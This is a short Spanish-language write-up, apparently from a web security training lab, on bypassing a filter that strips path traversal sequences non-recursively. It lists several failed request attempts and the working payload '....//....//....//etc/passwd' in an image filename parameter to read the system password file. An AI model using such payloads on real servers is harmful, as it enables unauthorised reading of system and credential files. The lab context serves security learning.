🦉Laboratorio: recorrido de ruta de archivo , secuencias transversales eliminadas de forma no recursiv

Entonces vamos a interceptar la url de la imagen, la petición
Aqui la tenemos, vamos a empezar a modificar la url, para ver si podemos obtener la secuencia transversal de forma no recursiva →
El problema que estuve teniendo fue que intenté probar de todas las formas, sin embargo no hice la secuencia repetidas veces, por ello creía que no iba a poder encontrar la solución.
Las “soluciones” que probé yo:
/image?filename=12.jpg&….//etc/passwd
/image?filename=&….//etc/passwd
/image?filename=…./\etc/passwd
/image?filename=….//etc/passwd
/image?filename=….//….//etc/passwd → aqui me falto un recorrido más para la solución. ☹️
/image?filename=etc/passwd….//….//
Solución correcta:
/image?filename=….//….//….//etc/passwd → esta si era. 😄


Eso es todo gracias por leerme :)
PreviousLaboratorio: File path traversal, traversal sequences blocked with absolute path bypassNextLaboratorio: File path traversal, traversal sequences stripped with superfluous URL-decode
Last updated